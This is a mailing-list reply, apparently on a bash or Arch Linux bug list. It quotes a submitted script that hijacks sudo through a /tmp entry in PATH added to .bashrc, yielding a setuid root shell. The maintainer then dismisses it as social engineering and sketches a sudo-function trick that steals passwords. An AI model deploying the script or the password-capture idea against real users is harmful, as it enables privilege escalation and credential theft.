On 4/12/19 5:38 PM, bakzero wrote: > Hi, > I written an exploit which allow to became root when a normal user use sudo. > The following code add to the .bashrc configuration file the /tmp path. Then > when the user exec sudo he runs the fake one, giving you a root shell. Just > run it, when the normal user will use sudo you will get a root shell. > > chmod +x ./exploit.sh && ./exploit.sh > > #!/bin/bash > > PAYLOAD="/bin/bash" > CFILE=".temp0000" > PRIV="root" > COLOR='\033[1;31m' > > echo -e "$COLOR" > > echo -e "\n - Adding /tmp path on $HOME/.bashrc"; sleep 1 > echo export PATH=/tmp:$PATH >> $HOME/.bashrc > echo -e " - Creating C executable with setuid 0 " > sleep 1 > echo "#include <stdlib.h>" >/tmp/$CFILE.c > echo "int main(void) {" >>/tmp/$CFILE.c > echo "setuid(0);" >>/tmp/$CFILE.c > echo "system(\"$PAYLOAD\"); }" >>/tmp/$CFILE.c > /usr/bin/gcc /tmp/$CFILE.c -o /tmp/$CFILE &> /dev/null > rm -rf /tmp/$CFILE.c > echo -e " - Creating sudo script which will be executed by the victim "; > sleep 1 > echo "#!/bin/bash" > /tmp/sudo > echo "/usr/bin/sudo chown root:root /tmp/$CFILE && /usr/bin/sudo chmod 4755 > /tmp/$CFILE" >> /tmp/sudo > echo "/usr/bin/sudo \$1 \$2 \$3 \$4 \$5" >>/tmp/sudo && chmod +x /tmp/sudo > echo " - Wait while the victim open a shell and execute sudo" > while [[ $(stat -c '%U' /tmp/$CFILE) != $PRIV ]] ; > do > sleep 1 > done > echo -e " - Root shell with SETUID 0 created on $CFILE"; sleep 1 > echo -e " - Cleaning sudo script and path line\n"; sleep 1 > sed -i -e '/^export PATH/d' $HOME/.bashrc > rm -rf /tmp/sudo > /tmp/$CFILE > > Impact > > An attacker logged into a system as normal user, using a sudo weakness, can > escalate to root
That's not a bug in bash, and it's not even a bug. Tricking the user into running arbitrary code is the oldest trick in the book. A much more subtle trick would be to add $HOME/.local/share/bash-completion/completions/sudo and define a sudo function that prompts for the password, writes it to wherever you want, echoes a message pretending that you mistyped the password, and calls the original command again after undefining itself and doing cleanup. But that still isn't a bug in bash. It's more along the lines of a social engineering exploit. -- Eli Schwartz Arch Linux Bug Wrangler and Trusted User
signature.asc
Description: OpenPGP digital signature